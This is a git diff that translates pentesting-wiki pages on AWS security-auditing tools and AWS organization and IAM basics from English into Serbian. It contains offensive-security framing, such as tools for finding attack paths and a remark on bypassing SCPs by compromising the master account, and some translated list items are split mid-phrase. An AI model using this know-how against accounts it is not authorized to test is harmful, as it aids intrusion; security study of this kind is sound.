+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit od Aqua je projekat otvorenog koda dizajniran da omogući otkrivanje **bezbednosnih rizika u cloud infrastrukturi** naloga, uključujući: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI) i GitHub (ne traži ShadowAdmins).
 ```bash
 ./index.js --csv=file.csv --console=table --config ./config.js
 
 # Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
 ## use "cis" for cis level 1 and 2
 ```
-
-- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
-
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler je alat otvorenog koda za procenu najboljih praksi bezbednosti AWS-a, revizije, odgovor na incidente, kontinuirano praćenje, učvršćivanje i spremnost za forenziku.
 ```bash
 # Install python3, jq and git
 # Install
@@ -331,15 +314,11 @@ prowler -v
 prowler 
 prowler aws --profile custom-profile [-M csv json json-asff html]
 ```
-
-- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
-
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox vam pomaže da steknete situacionu svest u nepoznatim cloud okruženjima. To je alat otvorenog koda za komandnu liniju kreiran da pomogne pentesterima i drugim profesionalcima u ofanzivnoj bezbednosti da pronađu iskoristive napadne puteve u cloud infrastrukturi.
 ```bash
 cloudfox aws --profile [profile-name] all-checks
 ```
-
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
-
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite je alat za reviziju bezbednosti otvorenog koda za više oblaka, koji omogućava procenu bezbednosnog stanja oblaka.
 ```bash
 # Install
 virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
 # Get info
 scout aws -p dev
 ```
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (koristi python2.7 i izgleda neodržavano)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus je moćan alat za AWS EC2 / S3 / CloudTrail / CloudWatch / KMS najbolje prakse učvršćivanja (izgleda neodržavano). Proverava samo podrazumevane konfiguracije kredencijala unutar sistema.
 
-- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
-- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+### Kontinuirana Revizija
 
-### Constant Audit
-
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
-
-## DEBUG: Capture AWS cli requests
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian je motor pravila za upravljanje javnim cloud računima i resursima. Omogućava korisnicima da **definišu politike za omogućavanje dobro upravljane cloud infrastrukture**, koja je i sigurna i optimizovana za troškove. Konsoliduje mnoge ad-hoc skripte koje organizacije imaju u lagan i fleksibilan alat, sa jedinstvenim metrikama i izveštavanjem.
+- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** je platforma za **kontinuirano praćenje usklađenosti, izveštavanje o usklađenosti i automatizaciju bezbednosti za cloud**. U PacBot-u, bezbednosne i usklađene politike se implementiraju kao kod. Svi resursi otkriveni od strane PacBot-a se ocenjuju prema ovim politikama kako bi se procenila usklađenost sa politikama. PacBot **auto-fix** okvir pruža mogućnost automatskog odgovora na kršenja politika preduzimanjem unapred definisanih akcija.
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert je serverless, **real-time** okvir za analizu podataka koji vam omogućava da **prikupljate, analizirate i obaveštavate** o podacima iz bilo kog okruženja, **koristeći izvore podataka i logiku obaveštavanja koju definišete**. Timovi za računarstvo bezbednosti koriste StreamAlert da skeniraju terabajte log podataka svakog dana za otkrivanje incidenata i odgovor na njih.
 
+## DEBUG: Zabeleži AWS cli zahteve
 ```bash
 # Set proxy
 export HTTP_PROXY=http://localhost:8080
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
 # Run aws cli normally trusting burp cert
 aws ...
 ```
-
-## References
+## Reference
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 02e6e7729..03d199541 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -1,331 +1,321 @@
-# AWS - Basic Information
+# AWS - Osnovne Informacije
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organization Hierarchy
+## Hijerarhija Organizacije
 
 ![](<../../../images/image (151).png>)
 
-### Accounts
+### Računi
 
-In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+U AWS-u postoji **root račun**, koji je **glavni kontejner za sve račune** vaše **organizacije**. Međutim, ne morate koristiti taj račun za implementaciju resursa, možete kreirati **druge račune kako biste odvojili različite AWS** infrastrukture između njih.
 
-This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+To je veoma zanimljivo sa **bezbednosnog** stanovišta, jer **jedan račun neće moći da pristupi resursima drugog računa** (osim ako su mostovi posebno kreirani), tako da na ovaj način možete postaviti granice između implementacija.
 
-Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+Stoga, postoje **dva tipa računa u organizaciji** (govorimo o AWS računima, a ne o korisničkim računima): jedan jedini račun koji je označen kao račun za upravljanje, i jedan ili više članova računa.
 
-- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+- **Račun za upravljanje (root račun)** je račun koji koristite za kreiranje organizacije. Iz računa za upravljanje organizacijom, možete uraditi sledeće:
 
-  - Create accounts in the organization
-  - Invite other existing accounts to the organization
-  - Remove accounts from the organization
-  - Manage invitations
-  - Apply policies to entities (roots, OUs, or accounts) within the organization
-  - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
-  - It's possible to login as the root user using the email and password used to create this root account/organization.
+- Kreirati račune u organizaciji
+- Pozvati druge postojeće račune u organizaciju
+- Ukloniti račune iz organizacije
+- Upravljati pozivnicama
+- Primeni politike na entitete (root, OU ili račune) unutar organizacije
+- Omogućiti integraciju sa podržanim AWS uslugama kako bi se obezbedila funkcionalnost usluga širom svih računa u organizaciji.
+- Moguće je prijaviti se kao root korisnik koristeći email i lozinku korišćene za kreiranje ovog root računa/organizacije.
 
-  The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
-
-- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
-  - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+Račun za upravljanje ima **odgovornosti računa za plaćanje** i odgovoran je za plaćanje svih troškova koje generišu članovi računi. Ne možete promeniti račun za upravljanje organizacijom.
 
+- **Članovi računi** čine sve ostale račune u organizaciji. Račun može biti član samo jedne organizacije u isto vreme. Možete prikačiti politiku na račun kako biste primenili kontrole samo na taj jedan račun.
+- Članovi računi **moraju koristiti važeću email adresu** i mogu imati **ime**, generalno neće moći da upravljaju naplatom (ali im može biti dat pristup tome).
 ```
 aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
 ```
+### **Organizacione jedinice**
 
-### **Organization Units**
-
-Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
-
+Računi se mogu grupisati u **organizacione jedinice (OU)**. Na ovaj način, možete kreirati **politike** za organizacionu jedinicu koje će biti **primenjene na sve podračune**. Imajte na umu da OU može imati druge OU kao decu.
 ```bash
 # You can get the root id from aws organizations list-roots
 aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
 ```
-
 ### Service Control Policy (SCP)
 
-A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+**Politika kontrole usluga (SCP)** je politika koja specificira usluge i akcije koje korisnici i uloge mogu koristiti u nalozima na koje SCP utiče. SCP-ovi su **slični IAM** politikama dozvola osim što **ne dodeljuju nikakve dozvole**. Umesto toga, SCP-ovi specificiraju **maksimalne dozvole** za organizaciju, organizacionu jedinicu (OU) ili nalog. Kada prikačite SCP na koren vaše organizacije ili na OU, **SCP ograničava dozvole za entitete u članicama naloga**.
 
-This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
-The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+Ovo je JEDINI način na koji **čak i korisnik sa root privilegijama može biti sprečen** da uradi nešto. Na primer, može se koristiti da se spreči korisnike da onemoguće CloudTrail ili obrišu rezervne kopije.\
+Jedini način da se to zaobiđe je da se kompromituje i **glavni nalog** koji konfiguriše SCP-ove (glavni nalog ne može biti blokiran).
 
 > [!WARNING]
-> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+> Imajte na umu da **SCP-ovi samo ograničavaju principe u nalogu**, tako da drugi nalozi nisu pogođeni. To znači da imati SCP koji odbija `s3:GetObject` neće sprečiti ljude da **pristupaju javnom S3 bucket-u** u vašem nalogu.
 
-SCP examples:
+Primeri SCP-a:
 
-- Deny the root account entirely
-- Only allow specific regions
-- Only allow white-listed services
-- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+- Odbijanje glavnog naloga u potpunosti
+- Dozvoliti samo specifične regione
+- Dozvoliti samo usluge sa bele liste
+- Odbijanje GuardDuty, CloudTrail i S3 javnog blokiranja pristupa od
 
-  being disabled
+biti onemogućeni
 
-- Deny security/incident response roles from being deleted or
+- Odbijanje uloga za bezbednost/odgovor na incidente od
 
-  modified.
+biti obrisane ili
 
-- Deny backups from being deleted.
-- Deny creating IAM users and access keys
+modifikovane.
 
-Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+- Odbijanje brisanja rezervnih kopija.
+- Odbijanje kreiranja IAM korisnika i pristupnih ključeva
+
+Pronađite **JSON primere** u [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
 
 ### ARN
 
-**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
-
+**Amazon Resource Name** je **jedinstveno ime** koje svaki resurs unutar AWS-a ima, sastoji se ovako:
 ```
 arn:partition:service:region:account-id:resource-type/resource-id
 arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
 ```
-
-Note that there are 4 partitions in AWS but only 3 ways to call them:
+Napomena da postoje 4 particije u AWS-u, ali samo 3 načina da ih pozovete:
 
 - AWS Standard: `aws`
 - AWS China: `aws-cn`
-- AWS US public Internet (GovCloud): `aws-us-gov`
+- AWS US javni Internet (GovCloud): `aws-us-gov`
 - AWS Secret (US Classified): `aws`
 
-## IAM - Identity and Access Management
+## IAM - Upravljanje identitetom i pristupom
 
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+IAM je usluga koja će vam omogućiti da upravljate **autentifikacijom**, **autorizacijom** i **kontrolom pristupa** unutar vašeg AWS naloga.
 
-- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-- **Access Control** - The method and process of how access is granted to a secure resource
+- **Autentifikacija** - Proces definisanja identiteta i verifikacije tog identiteta. Ovaj proces se može podeliti na: Identifikaciju i verifikaciju.
+- **Autorizacija** - Određuje šta identitet može da pristupi unutar sistema nakon što je autentifikovan.
+- **Kontrola pristupa** - Metod i proces kako se pristup dodeljuje sigurnom resursu.
 
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+IAM se može definisati po svojoj sposobnosti da upravlja, kontroliše i reguliše mehanizme autentifikacije, autorizacije i kontrole pristupa identiteta vašim resursima unutar vašeg AWS naloga.
 
-### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) 
+### [AWS nalog root korisnika](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) 
 
-When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+Kada prvi put kreirate Amazon Web Services (AWS) nalog, počinjete sa jednim identitetom za prijavu koji ima **potpun pristup svim** AWS uslugama i resursima u nalogu. Ovo je _**root korisnik**_ AWS naloga i pristupa mu se prijavom sa **email adresom i lozinkom koje ste koristili za kreiranje naloga**.
 
-Note that a new **admin user** will have **less permissions that the root user**.
+Napomena da novi **admin korisnik** ima **manje dozvole od root korisnika**.
 
-From a security point of view, it's recommended to create other users and avoid using this one.
+Sa bezbednosnog stanovišta, preporučuje se kreiranje drugih korisnika i izbegavanje korišćenja ovog.
 
-### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) 
+### [IAM korisnici](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) 
 
-An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+IAM _korisnik_ je entitet koji kreirate u AWS-u da **predstavlja osobu ili aplikaciju** koja ga koristi za **interakciju sa AWS-om**. Korisnik u AWS-u se sastoji od imena i akreditiva (lozinka i do dva pristupna ključa).
 
-When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+Kada kreirate IAM korisnika, dodeljujete mu **dozvole** tako što ga činite **članom korisničke grupe** koja ima odgovarajuće politike dozvola (preporučeno), ili **direktno povezivanjem politika** sa korisnikom.
 
-Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+Korisnici mogu imati **omogućen MFA za prijavu** putem konzole. API tokeni korisnika sa omogućenim MFA nisu zaštićeni MFA. Ako želite da **ograničite pristup API ključevima korisnika koristeći MFA**, morate naznačiti u politici da je za izvršavanje određenih radnji MFA potrebno (primer [**ovde**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
 
 #### CLI
 
-- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+- **ID pristupnog ključa**: 20 nasumičnih velikih alfanumeričkih karaktera kao što su AKHDNAPO86BSHKDIRYT
+- **ID tajnog pristupnog ključa**: 40 nasumičnih velikih i malih karaktera: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Nije moguće povratiti izgubljene ID-ove tajnog pristupnog ključa).
 
-Whenever you need to **change the Access Key** this is the process you should follow:\
+Kad god trebate da **promenite pristupni ključ**, ovo je proces koji treba da pratite:\
 &#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
 
-### MFA - Multi Factor Authentication
+### MFA - Višefaktorska autentifikacija
 
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+Koristi se za **kreiranje dodatnog faktora za autentifikaciju** pored vaših postojećih metoda, kao što je lozinka, čime se stvara višefaktorski nivo autentifikacije.\
+Možete koristiti **besplatnu virtuelnu aplikaciju ili fizički uređaj**. Možete koristiti aplikacije poput Google autentifikacije besplatno za aktivaciju MFA u AWS-u.
 
-Policies with MFA conditions can be attached to the following:
+Politike sa MFA uslovima mogu se povezati sa sledećim:
 
-- An IAM user or group
-- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
-- The trust policy of an IAM role that can be assumed by a user
-
-If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
-Note that **`AssumeRole` credentials don't contain this information**.
+- IAM korisnikom ili grupom
+- Resursom kao što je Amazon S3 bucket, Amazon SQS queue ili Amazon SNS topic
+- Politika poverenja IAM uloge koju može preuzeti korisnik
 
+Ako želite da **pristupite putem CLI** resursu koji **proverava MFA**, morate pozvati **`GetSessionToken`**. To će vam dati token sa informacijama o MFA.\
+Napomena da **`AssumeRole` akreditivi ne sadrže ove informacije**.
 ```bash
 aws sts get-session-token --serial-number  --token-code 
 ```
+As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), postoje mnogi različiti slučajevi gde **MFA ne može biti korišćen**.
 
-As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+### [IAM korisničke grupe](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 
 
-### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 
+IAM [korisnička grupa](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) je način da se **prikače politike više korisnika** u isto vreme, što može olakšati upravljanje dozvolama za te korisnike. **Uloge i grupe ne mogu biti deo grupe**.
 
-An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+Možete prikačiti **politiku zasnovanu na identitetu korisničkoj grupi** tako da svi **korisnici** u korisničkoj grupi **dobiju dozvole politike**. **Ne možete** identifikovati **korisničku grupu** kao **`Principal`** u **politici** (kao što je politika zasnovana na resursima) jer se grupe odnose na dozvole, a ne na autentifikaciju, a principi su autentifikovani IAM entiteti.
 
-You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+Evo nekih važnih karakteristika korisničkih grupa:
 
-Here are some important characteristics of user groups:
+- **Korisnička grupa** može **sadržati mnogo korisnika**, a **korisnik** može **pripadati više grupa**.
+- **Korisničke grupe ne mogu biti ugnježdene**; mogu sadržati samo korisnike, ne i druge korisničke grupe.
+- Ne postoji **podrazumevana korisnička grupa koja automatski uključuje sve korisnike u AWS nalogu**. Ako želite da imate takvu korisničku grupu, morate je kreirati i dodeliti svakom novom korisniku.
+- Broj i veličina IAM resursa u AWS nalogu, kao što su broj grupa i broj grupa kojima korisnik može biti član, su ograničeni. Za više informacija, pogledajte [IAM i AWS STS kvote](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
 
-- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
-- **User groups can't be nested**; they can contain only users, not other user groups.
-- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
-- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+### [IAM uloge](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) 
 
-### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) 
+IAM **uloga** je vrlo **slična** **korisniku**, jer je to **identitet sa politikama dozvola koje određuju šta** može i ne može da radi u AWS-u. Međutim, uloga **nema nikakve akreditive** (lozinku ili pristupne ključeve) povezane sa njom. Umesto da bude jedinstveno povezana sa jednom osobom, uloga je namenjena da bude **preuzeta od strane bilo koga ko je treba (i ima dovoljno dozvola)**. **IAM korisnik može preuzeti ulogu da privremeno** preuzme različite dozvole za određeni zadatak. Uloga može biti **dodeljena** [**federisanom korisniku**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) koji se prijavljuje koristeći eksternog provajdera identiteta umesto IAM-a.
 
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
-
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+IAM uloga se sastoji od **dvaju tipova politika**: **politika poverenja**, koja ne može biti prazna, definišući **ko može preuzeti** ulogu, i **politika dozvola**, koja ne može biti prazna, definišući **šta može pristupiti**.
 
 #### AWS Security Token Service (STS)
 
-AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+AWS Security Token Service (STS) je veb servis koji olakšava **izdavanje privremenih, ograničenih akreditiva**. Specijalno je prilagođen za:
 
-### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) 
+### [Privremeni akreditivi u IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) 
 
-**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+**Privremeni akreditivi se prvenstveno koriste sa IAM ulogama**, ali postoje i druge upotrebe. Možete zatražiti privremene akreditive koji imaju ograničeniji skup dozvola od vašeg standardnog IAM korisnika. Ovo **sprečava** vas od **slučajnog obavljanja zadataka koji nisu dozvoljeni** sa ograničenim akreditivima. Prednost privremenih akreditiva je ta što automatski ističu nakon određenog vremenskog perioda. Imate kontrolu nad trajanjem tokom kojeg su akreditivi validni.
 
-### Policies
+### Politike
 
-#### Policy Permissions
+#### Dozvole politike
 
-Are used to assign permissions. There are 2 types:
+Koriste se za dodeljivanje dozvola. Postoje 2 tipa:
 
-- AWS managed policies (preconfigured by AWS)
-- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified.\
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+- AWS upravljane politike (prekonfigurisane od strane AWS-a)
+- Politike koje upravlja korisnik: Konfigurišete ih vi. Možete kreirati politike zasnovane na AWS upravljanim politikama (modifikujući jednu od njih i kreirajući svoju), koristeći generator politika (GUI prikaz koji vam pomaže u dodeljivanju i odbijanju dozvola) ili pišući svoje.
 
+Po **podrazumevanju, pristup** je **odbijen**, pristup će biti odobren ako je eksplicitna uloga navedena.\
+Ako **jedna "Odbij" postoji, ona će nadjačati "Dozvoli"**, osim za zahteve koji koriste korenske bezbednosne akreditive AWS naloga (koji su podrazumevano dozvoljeni).
 ```javascript
 {
-    "Version": "2012-10-17",  //Version of the policy
-    "Statement": [  //Main element, there can be more than 1 entry in this array
-        {
-            "Sid": "Stmt32894y234276923" //Unique identifier (optional)
-            "Effect": "Allow", //Allow or deny
-            "Action": [  //Actions that will be allowed or denied
-                "ec2:AttachVolume",
-                "ec2:DetachVolume"
-            ],
-            "Resource": [ //Resource the action and effect will be applied to
-                "arn:aws:ec2:*:*:volume/*",
-                "arn:aws:ec2:*:*:instance/*"
-            ],
-            "Condition": { //Optional element that allow to control when the permission will be effective
-                "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
-            }
-        }
-    ]
+"Version": "2012-10-17",  //Version of the policy
+"Statement": [  //Main element, there can be more than 1 entry in this array
+{
+"Sid": "Stmt32894y234276923" //Unique identifier (optional)
+"Effect": "Allow", //Allow or deny
+"Action": [  //Actions that will be allowed or denied
+"ec2:AttachVolume",
+"ec2:DetachVolume"
+],
+"Resource": [ //Resource the action and effect will be applied to
+"arn:aws:ec2:*:*:volume/*",
+"arn:aws:ec2:*:*:instance/*"
+],
+"Condition": { //Optional element that allow to control when the permission will be effective
+"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+}
+}
+]
 }
 ```
-
 The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
 The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
 
 #### Inline Policies
 
-This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+Ova vrsta politika je **direktno dodeljena** korisniku, grupi ili ulozi. Tada se ne pojavljuju na listi politika kao što to može biti slučaj sa bilo kojom drugom.\
+Inline politike su korisne ako želite da **održite strogu jedan-na-jedan vezu između politike i identiteta** na koji se primenjuju. Na primer, želite da budete sigurni da dozvole u politici nisu nenamerno dodeljene identitetu osim onog za koji su namenjene. Kada koristite inline politiku, dozvole u politici ne mogu biti nenamerno povezane sa pogrešnim identitetom. Pored toga, kada koristite AWS Management Console za brisanje tog identiteta, politike ugrađene u identitet se takođe brišu. To je zato što su deo glavne entiteta.
 
 #### Resource Bucket Policies
 
-These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+Ovo su **politike** koje se mogu definisati u **resursima**. **Nisu svi resursi AWS-a podržavaju njih**.
 
-If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+Ako glavni entitet nema eksplicitnu zabranu na njih, a politika resursa im omogućava pristup, tada su dozvoljeni.
 
 ### IAM Boundaries
 
-IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+IAM granice se mogu koristiti za **ograničavanje dozvola kojima korisnik ili uloga treba da imaju pristup**. Na ovaj način, čak i ako se korisniku dodeli drugačiji skup dozvola putem **druge politike**, operacija će **neuspeti** ako pokuša da ih koristi.
 
-A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
+Granica je samo politika koja je povezana sa korisnikom i **ukazuje na maksimalni nivo dozvola koje korisnik ili uloga mogu imati**. Dakle, **čak i ako korisnik ima Administrator pristup**, ako granica ukazuje da može samo da čita S· kante, to je maksimum što može da uradi.
 
-**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+**Ovo**, **SCPs** i **pridržavanje principa minimalnih privilegija** su načini da se kontroliše da korisnici nemaju više dozvola nego što im je potrebno.
 
 ### Session Policies
 
